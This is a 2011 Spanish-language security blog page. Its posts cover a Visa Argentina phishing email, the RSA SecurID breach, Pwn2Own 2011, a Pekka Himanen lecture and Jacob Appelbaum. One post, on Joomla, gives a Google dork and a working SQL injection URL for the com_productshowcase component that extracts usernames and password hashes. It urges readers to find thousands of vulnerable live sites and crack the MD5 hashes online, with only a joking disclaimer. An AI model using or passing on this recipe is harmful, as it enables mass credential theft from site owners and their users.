martes, 12 de abril de 2011

Nuevo caso de Phishing de Visa y van...

Hoy entre toda la basura de correo que recibo diariamente, me llamó la atención uno de la tarjeta VISA, (seguro es un caso de phishing me dije yo), luego de analizar los vinculos de las imagenes , etc, parecia de lo mas creible ...hasta que realicé la prueba de fuego, abrir el mail y pasar con el puntero del mouse encima del link sugerido y voilá apareció lo que me temía...la direccion IP a la que apunta el link con el contenido del formulario falso...



por lo que decidi enviarlo al sitio del amigo Cristian Borghello para su archivo y denuncia

a: phishing@segu-info.com.ar

El diseño es muy parecido al de Visa Home pero en realidad se trata de una página diseñada para robar la información. El atacante solicita las credenciales de acceso al portal y los datos de la tarjeta, titular, número, fecha de expiración y códigos de seguridad.

Al hacer clic para acceder se muestra un mensaje de error y luego la víctima es redireccionada al sitio real de Visa Home para realizar el logueo nuevamente. En este punto sus datos ya se encuentran en manos del atacante.-


El sitio real de Visa Home Argentina es: https://inetserv.visa.com.ar/vhs/app/Login.po

Este tipo de ataques, suelen engañar a muchos usuarios. Detectarlos no es complicado.

En primer lugar hay que tener en cuenta que Visa no envía esta clase de mensajes ni solicita información por correo. En cualquier caso, ante la duda lo ideal es llamar al banco.

El texto del mensaje es

Titulo: Aviso
Remitente: Visa Argentina

Visa Home esta constantemente trabajando para su seguridad,
hemos notado una serie de irregularidades en su cuenta en
los últimos días y tuvimos que suspender el acceso a su cuenta temporalmente,
para reactivar su cuenta por favor dirijase a https://inetserv.visa.com.ar/vhs/app/Login.po (Página web falsa exactamente igual a la de Visa)
Y llene los campos necesarios, esto hará que restablezcamos
su cuenta lo antes posible.

Lamentamos las molestias.


Merlina Irigotia,
Departamento Legales,
Visa Argentina.


Comentarios...que se puede decir, cada vez hay mas que quieren obtener dinero de los que lo ganan honestamente...por lo consiguiente hay menos que lo ganan honestamente...

miércoles, 30 de marzo de 2011

El Negocio del Malware




Comentarios: Lo estoy traduciendo al espanish ...

sábado, 19 de marzo de 2011

Sql INjection en Joomla!

Se ha publicado una vulnerabilidad de inyección SQL que afecta a la rama 1.6.0 del popular gestor de contenidos Joomla. El fallo ha sido descubierto por Aung Khant que forma parte de 'YGN Ethical Hacker Group'.

Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.

El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.

Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:

DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*

Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/


Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)

Hackearon a RSA

La división de seguridad de EMC, RSA, fué comprometida en su seguridad.

Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".

Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.


Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".

Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.

"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.

Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.

Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.

Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-

viernes, 11 de marzo de 2011

Pwn2Own primer día: Internet Explorer 8 y Safari hackeados

Tiene lugar por estos momentos la CanSecWest en Vancouver (Canadá), una conferencia mas de seguridad de las tantas que hay, igual? No, porque en esta conferencia en particular esta el Pwn2Own, el cual es una competición en la cual los participantes deben "hackear" determinadas aplicaciones, explotando algunas vulnerabilidades de las mismas y en caso de tener exito enviar un informe completo al fabricante para que puede ser parcheado en las proximas versiones, en este año 2011 los actores principales son los navegadores con la salvedad que Google ofrecio un premio al que lograse vulnerar a su naveghador estrella Chrome, si bien hace poco Google lanzo una actualizacion de seguridad para el mismo que corrige 24 vulnerabilidades, se espera que tambien Chrome sea una victima mas del ingenio de los participantes, por ahora ya han caido Internet Explorer 8 corriendo sobre un windows 7 con SP1 y Safari 5.0.3 sobre Mac OS X 10.6.6 .

La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.

Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).


Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-

martes, 8 de febrero de 2011

Conferencia de Pekka Himanen

Tercera jornada del ciclo "Entendiendo los cambios. Ideas, libros y autores en Fundación Telefónica". Pekka Himanen: La Ética del Hacker: ¿Cuál es la nueva cultura de la creatividad necesaria para el futuro?

10 de febrero a las 12:00 horas en el Salón de Actos de Fundación Telefónica en Madrid (Gran Vía 28, planta 2).
El evento podrá seguirse en directo por Internet (ver abajo)

En esta ocasión, la periodista Mamen Mendizábal, presentadora de informativos de la cadena de televisión LaSexta, moderará el evento.


Pekka Himanen es un filósofo finlandés, doctor por la Universidad de Helsinki, que ha trabajado como investigador en Finlandia, Inglaterra y en las universidades norteamericanas de Stanford y Berkeley. Asimismo, ha sido asesor en temas sobre la sociedad de la información en los distintos gobiernos finlandeses y es muy conocido en el mundo de la cultura por sus relaciones con los artistas más vanguardistas y los medios de comunicación.

Himanen ha plasmado sus ideas en su obra más conocida, La ética del hacker y el espíritu de la era de la información (2001), en la que desarrolla los fundamentos y consecuencias de la “ética hacker”.

Se trata de una nueva ética surgida en las comunidades virtuales o cibercomunidades, y aplicada hoy en día en todo tipo de comunidades. La expresión fue acuñada en los años 80 del siglo pasado por Steven Levy, y engloba los principios morales que surgieron a finales de los años cincuenta en el Laboratorio de Inteligencia Artificial del MIT y, en general, en la cultura de los aficionados a la informática de los años sesenta y setenta. De aquellos principios, que se resumen en el acceso libre a la información y en que la informática puede mejorar la calidad de vida de las personas, es heredero y principal representante actual nuestro ponente.

La ética del trabajo para el hacker se funda en el valor de la creatividad, y consiste en combinar la pasión con la libertad. El dinero deja de ser un valor en sí mismo y el beneficio se cifra en metas como el valor social y el libre acceso, la transparencia y la franqueza.

Himanen también es autor de El Estado del bienestar y la sociedad de la información: El modelo finlandés (2002), obra que comparte en autoría con el sociólogo Manuel Castells. Recientemente ha publicado "The Culture of Creativity".



Seguir el evento onlineLa conferencia se puede seguir EN DIRECTO desde esta página y a través de nuestra cuenta de Twitter: @fundacionTef con el hastag (etiqueta): #ftHimanen

El dia del evento se habilitará el acceso a la retransmisión del evento.
http://www.fundacion.telefonica.com/es/debateyconocimiento/3ciclo/conf

miércoles, 2 de febrero de 2011

Jacob Appelbaum de TOR project

Hoy les quiero hablar de Jacob Appelbaum, Jacob es un investigador independiente en ciencias de la computacion, actualmente trabaja en la Universidad de Washington, y es uno de los miembros principales del proyecto TOR,->https://www.torproject.org/<- Jacob es reconocido por representar a Wikileaks en la "hope Conference 2010", ha sido intervenido por diferentes agencias de EEUU , las cuales intervinieron su cuenta de Twitter->http://twitter.com/ioerror<-. Jacob es un miembro activo del Hacker colectivo Cult of The Dead Cow (culto de la Vaca Muerta, ya se suena mas "poético" en Inglés) y es cofundador del Espacio Hacker en San Francisco junto con Mitch Altman, pro lo que me trae hoy a comentarles de él es lo que hizo por la causa Egipcia Jacob ha sacado tiempo para husmear en las conexiones a internet de varios ministerios egipcios. Su objetivo era encontrar puertas de entrada por las que dar conectividad a los egipcios a escondidas.

La existencia de estas vías de entrada puede estar detrás del cierre de Noor.net, el último ISP que funcionaba en Egipto. Aunque daba conectividad a la Bolsa cairota y firmas estadounidenses, el Gobierno desconectó sus routers. Su red estaba siendo usada para enviar mensajes sobre las protestas. Applebaum llegó a pedir por
Twitter los números de teléfonos móviles de algunos altos cargos.
Se desconoce para qué.

Otro link
https://blog.torproject.org/blog/jacob-and-matt-join-tor-project
http://en.wikipedia.org/wiki/Cult_of_the_Dead_Cow

Su Presentacion:

Jacob Appelbaum
Jacob Appelbaum is hacktivist.
My name is Jacob Appelbaum. I am a hacker. I am a photographer. I
am an activist. I audit code, I audit networks. I strive to change
the world I live in. I am security specialist for non-profit/NGO
organizations. My resume includes working with Greenpeace, The Open
Society Institute, Tactical Tech, The Ruckus Society, The
Rainforest Action Network and others. My professional emphasis is
in network security with a focus on environmental and human rights.
I'm interested in diving, motorcycles, piloting, documenting,
photography, robotics, language, traveling, writing and other
random things. I have an interest in the world.

Links
http://www.appelbaum.net/

Como leerán es un gran Personaje al que vale la pena emularlo y seguirlo en sus acciones, saludos